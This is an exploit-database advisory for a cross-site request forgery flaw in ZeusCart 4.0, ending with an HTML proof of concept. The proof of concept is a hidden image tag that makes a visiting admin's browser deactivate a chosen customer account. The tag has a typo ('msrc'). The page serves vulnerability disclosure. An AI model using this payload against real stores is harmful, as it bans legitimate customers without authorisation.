ZeusCart 4.0 Deactivate Customer Accounts CSRF

vendor:

ZeusCart

by:

mqt

6.8

CVSS

MEDIUM

Cross Site Request Forgery

352

CWE

Product Name: ZeusCart

Affected Version From: ZeusCart 4.0

Affected Version To: ZeusCart 4.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:zeuscart:zeuscart:4.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

ZeusCart 4.0 Deactivate Customer Accounts CSRF

Due to the form not being validated, ZeusCart4.0 suffers from a Cross Site Request Forgery vulnerability, which means an attacker can perform actions on behalf of a victim, by having the victim visit an attacker controlled site. In this case, the attacker is able to 'deactivate' any customer accounts, which means that the account is banned and cannot login.

Mitigation:

Validate all forms and inputs to prevent CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF

1. Vulnerability Description

Due to the form not being validated, ZeusCart4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.

In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot login.

Proof of Concept:
<html>
	<body>
		<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
	</body>
</html>